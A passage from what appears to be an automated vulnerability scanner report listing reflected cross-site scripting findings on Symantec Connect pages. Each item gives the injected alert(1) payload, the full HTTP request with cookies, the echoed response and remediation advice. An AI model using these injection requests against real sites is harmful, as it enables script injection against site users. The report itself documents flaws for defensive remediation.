Date: Mon, 14 Feb 2011 19:04:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(1)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.22. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 864fa'-alert(1)-'729635a1f82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default864fa'-alert(1)-'729635a1f82/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:46 +0000
Vary: Cookie
ETag: "1297710286"
Content-Type: text/html; charset=utf-8
Content-Length: 33551
X-Varnish: 1761089256
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:04:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default864fa'-alert(1)-'729635a1f82/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.23. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11459'-alert(1)-'232c057bc52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes11459'-alert(1)-'232c057bc52/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:21 +0000
Vary: Cookie
ETag: "1297710321"
Content-Type: text/html; charset=utf-8
Content-Length: 33551
X-Varnish: 1477190600
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:05:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes11459'-alert(1)-'232c057bc52/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.24. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e8e'-alert(1)-'0b4a783348a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2a0e8e'-alert(1)-'0b4a783348a/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:10 +0000
Vary: Cookie
ETag: "1297710370"
Content-Type: text/html; charset=utf-8
Content-Length: 33551
X-Varnish: 1761090028
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2a0e8e'-alert(1)-'0b4a783348a/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.25. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58e85'-alert(1)-'828679fe6f9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images58e85'-alert(1)-'828679fe6f9/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:50 +0000
Vary: Cookie
ETag: "1297710410"
Content-Type: text/html; charset=utf-8
Content-Length: 33551
X-Varnish: 1477191771
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images58e85'-alert(1)-'828679fe6f9/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.26. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a696'-alert(1)-'b24e85c34a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico2a696'-alert(1)-'b24e85c34a HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:07:22 +0000
Vary: Cookie
ETag: "1297710442"
Content-Type: text/html; charset=utf-8
Content-Length: 33544
X-Varnish: 1477192232
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1782
Date: Mon, 14 Feb 2011 19:07:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico2a696'-alert(1)-'b24e85c34a';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.27. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/shadow-menu-global.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddbfc'-alert(1)-'24dbe7d474e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesddbfc'-alert(1)-'24dbe7d474e/default/themes/connect2/images/shadow-menu-global.png?2 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:15 +0000
Vary: Cookie
ETag: "1297710255"
Content-Type: text/html; charset=utf-8
Content-Length: 33630
X-Varnish: 1477189663
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:04:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesddbfc'-alert(1)-'24dbe7d474e/default/themes/connect2/images/shadow-menu-global.png?2';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/shadow-menu-global.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8a4a'-alert(1)-'01e3867d6ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/defaultc8a4a'-alert(1)-'01e3867d6ff/themes/connect2/images/shadow-menu-global.png?2 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:56 +0000
Vary: Cookie
ETag: "1297710296"
Content-Type: text/html; charset=utf-8
Content-Length: 33630
X-Varnish: 1477190247
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:04:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/defaultc8a4a'-alert(1)-'01e3867d6ff/themes/connect2/images/shadow-menu-global.png?2';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/shadow-menu-global.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f3d'-alert(1)-'a5e1d93483a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themesf6f3d'-alert(1)-'a5e1d93483a/connect2/images/shadow-menu-global.png?2 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:34 +0000
Vary: Cookie
ETag: "1297710334"
Content-Type: text/html; charset=utf-8
Content-Length: 33630
X-Varnish: 1477190752
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:05:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themesf6f3d'-alert(1)-'a5e1d93483a/connect2/images/shadow-menu-global.png?2';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/shadow-menu-global.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb4b4'-alert(1)-'5aa8f515ae6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2eb4b4'-alert(1)-'5aa8f515ae6/images/shadow-menu-global.png?2 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:23 +0000
Vary: Cookie
ETag: "1297710383"
Content-Type: text/html; charset=utf-8
Content-Length: 33630
X-Varnish: 1761090140
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2eb4b4'-alert(1)-'5aa8f515ae6/images/shadow-menu-global.png?2';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/shadow-menu-global.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8750f'-alert(1)-'68406772a73 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images8750f'-alert(1)-'68406772a73/shadow-menu-global.png?2 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:54 +0000
Vary: Cookie
ETag: "1297710414"
Content-Type: text/html; charset=utf-8
Content-Length: 33630
X-Varnish: 1477191816
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images8750f'-alert(1)-'68406772a73/shadow-menu-global.png?2';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/shadow-menu-global.png

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e742'-alert(1)-'81cccdb9e12 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/shadow-menu-global.png4e742'-alert(1)-'81cccdb9e12?2 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:07:27 +0000
Vary: Cookie
ETag: "1297710447"
Content-Type: text/html; charset=utf-8
Content-Length: 33630
X-Varnish: 1477192289
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Date: Mon, 14 Feb 2011 19:07:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png4e742'-alert(1)-'81cccdb9e12?2';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-share.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a449'-alert(1)-'2e6fb3b5c7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

